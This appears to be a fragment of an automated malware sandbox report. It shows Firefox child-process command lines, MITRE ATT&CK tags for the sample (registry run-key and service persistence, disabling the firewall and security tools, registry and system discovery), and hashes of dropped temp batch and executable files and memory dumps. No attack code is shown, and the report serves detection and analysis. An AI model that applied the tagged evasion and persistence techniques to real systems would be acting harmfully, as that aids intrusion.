    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.5.952776191\1336162824" -childID 4 -isForBrowser -prefsHandle 5032 -prefMapHandle 5040 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca3f4d4c-db65-4418-b836-d60b04141565} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 5048 1cd2afdb758 tab
    3⤵
    PID:5284
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.6.1356063075\399354290" -childID 5 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ac38b43-0050-47f6-bd58-5b7f4122e2db} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 5184 1cd2b1b3458 tab
    3⤵
    PID:5292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.7.1090552646\2030221666" -childID 6 -isForBrowser -prefsHandle 5384 -prefMapHandle 5388 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd89675a-b56b-484b-87a3-30a7d114440a} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 5376 1cd2b1b4058 tab
    3⤵
    PID:5300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp1589.tmp.bat

Filesize
1KB

MD5
da7a6b5a32f5119c8311a4725e81b77c

SHA1
fdc111c412235594de36057c8afa328406350610

SHA256
29453a2e6fffe4d8bf35a6df96e6dd3d5b52108a441cde6d96fa03f61331058a

SHA512
23bc044f330d36049f9565a017ded1d63876ed291769f61a5860386744e4e7c29d2aaa3271ca46d87d1c9d9334bb28bdc1cff8de6211db1b1a642f3ee1761ad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD6B9.tmp.exe

Filesize
230KB

MD5
428a7c63eff6bc7ca12c5b424e393c5d

SHA1
ebf788ee78bcf18348375f0a68fcc22f08639938

SHA256
7748aab1e6ad0bab94f9a0e0c444302957fc5e345d207a10531ce34227ab8639

SHA512
c33e6d335dd18e56c9461d0acd983e96ec496bca1d7fa9523076535877e8cdd811179c7b792f4adbed25fde7ae04c46e5abc827f95a51a1a3b772de7f0988d0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEA22.tmp.bat

Filesize
5KB

MD5
f1819f3bfb0c79b8a9de7745b40c5531

SHA1
14957855101257989c970211c1c781a783c5bd2d

SHA256
8a49a3fa34dd6002c0525b610dfd8134ef18b1f194a2f5f8f90d7cfa45915946

SHA512
bac5ab8c40e0e88e714a6eeff78c57ac578b5d267c5e32c7244fb69c0ae35b09a69845d3226e4d747e40b8c48f5d8948609530228d93a30cc54a7b75adc10a7e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
ea5338b5e6ccbe506730e7b6afc8c110

SHA1
a1d9be5c7dac852dd90e7ae91ddbdc47ac5a4566

SHA256
3f1967fa00cb20dccc49c16a41f4e39e4e242cf72a72bbec61225e8cd066d6f2

SHA512
b2d1ab8a68386129182902ff89b9e412d0739ce0dba7c96a1f68fb403647c3859ecdefd8cc336ac72748ed27d60ef543c618636d7b376d222d1c22a66fbd9ab9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\7fb0c72a-d69b-4fa4-bc22-50c0c807ec35

Filesize
10KB

MD5
a4fbc3071ab7f80eceadde6b67e61325

SHA1
ddf394b5c27efaf635497ea82d87c754b27b0960

SHA256
0a1b48be110aa44e7ddfcb345bea895a3eeed5b31f0669b9763497054326cf6e

SHA512
6254cf6f69d67fafec60b6acbcd073e49ae1a2b2bbb8c1577e4e40252927404516fe6c35f395b91cbcba0f10ca1fd76d99e5374585ed525819dd41b1fc6f795f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\f122b706-7bef-4d2f-b5bd-65a50c061003

Filesize
746B

MD5
fbd4d390bf281df87248fa9beb7470d3

SHA1
7a5da96ddef91bef5d041f7df3757d388f4e0bca

SHA256
b4d8c05f2e89051f13fd399a6abdfc62502e87d2a26430373dc93fb36406dde8

SHA512
dd9365d34fec05cb240d9d82a1cd596b62927c3b23f17e2ddc91eba36aa4e13003d7355d62135005397066a76ca80221b7aa637aba7846a6b3f261279cbb8692

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs-1.js

Filesize
6KB

MD5
d82a250c7e525ae3bc883ecc435f1438

SHA1
d079eedd924a720a7e97e424a6e0fc9db577310b

SHA256
b589c20b625e61ebd89941a60e371c5a3421e6cb9ec7c2f924925f74139c7d99

SHA512
f1481a38402cc663bb9ec1c0888f25b121bec2e134ba0cf25414739f9e42e7cb9adb4e227ec259f83c079fdd2bf451b6aad8c4ea74810e1eafad5b8a01b49dd1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js

Filesize
6KB

MD5
f46f649ab92f23d4cd6d4210165585de

SHA1
48c516c59a4489b56ed0eb1197ed3951aa9883cb

SHA256
5d28e960a42fbcb8e2ebfda2013cf986d86d2e23599a7ce07744e632581df7ed

SHA512
821985559bc9c6213823f0ff03852011d2dcf941e859ac6d65aacbee605ac0538db726457811450a8c46aa90459c08b47c31598053c8dcab2e4ba0b048075b68

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
13abc6fd188ebf5662c086a24e6db986

SHA1
f4ecc0cbfde96afab018c85bdb11a278f71f1eba

SHA256
c8f2dbc34fdd2e2aea745e0f30f48ea015b783ea85d8bf15511097f5e685e801

SHA512
8899a7ed09a57116aa3bcf30998c0479bb7853ba6215303efab1580192f33a1241a018fe88eec5d0c1697936ce12908b3136803e30a32f34825d2698bef52598

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore.jsonlz4

Filesize
891B

MD5
4487b4b4f0139128bb944ae747d8c164

SHA1
83ca9e7e8b7b96eb853f2e00afbb87027aca69b8

SHA256
2c300d273d1752d9a6eabef699b429772049d4733af6139b70c191361984e244

SHA512
193751f3e094decf2e9a61ffa85f8125cc2680332e9c9a41ab67de5128b6ebdada177d4961c094d75ba51d3d4f2d8a331702a683b964b72e7511084f330a059c

Download Submit
memory/3560-24-0x00007FF9166C0000-0x00007FF917181000-memory.dmp

Filesize
10.8MB

Download
memory/3560-20-0x000001B2D25B0000-0x000001B2D25F0000-memory.dmp

Filesize
256KB

Download
memory/3560-22-0x000001B2D42F0000-0x000001B2D4300000-memory.dmp

Filesize
64KB

Download
memory/3560-21-0x00007FF9166C0000-0x00007FF917181000-memory.dmp

Filesize
10.8MB

Download
memory/4496-6-0x0000000074CB0000-0x0000000075261000-memory.dmp

Filesize
5.7MB

Download
memory/4496-8-0x0000000001740000-0x0000000001750000-memory.dmp

Filesize
64KB

Download
memory/4496-7-0x0000000001740000-0x0000000001750000-memory.dmp

Filesize
64KB

Download
memory/4496-0-0x0000000074CB0000-0x0000000075261000-memory.dmp

Filesize
5.7MB

Download
memory/4496-5-0x0000000074CB0000-0x0000000075261000-memory.dmp

Filesize
5.7MB

Download
memory/4496-4-0x0000000001740000-0x0000000001750000-memory.dmp

Filesize
64KB

Download
memory/4496-2-0x0000000001740000-0x0000000001750000-memory.dmp

Filesize
64KB

Download
memory/4496-1-0x0000000074CB0000-0x0000000075261000-memory.dmp

Filesize
5.7MB

Download
memory/6108-136-0x00007FF9160F0000-0x00007FF916BB1000-memory.dmp

Filesize
10.8MB

Download
memory/6108-143-0x00007FF9160F0000-0x00007FF916BB1000-memory.dmp

Filesize
10.8MB

Download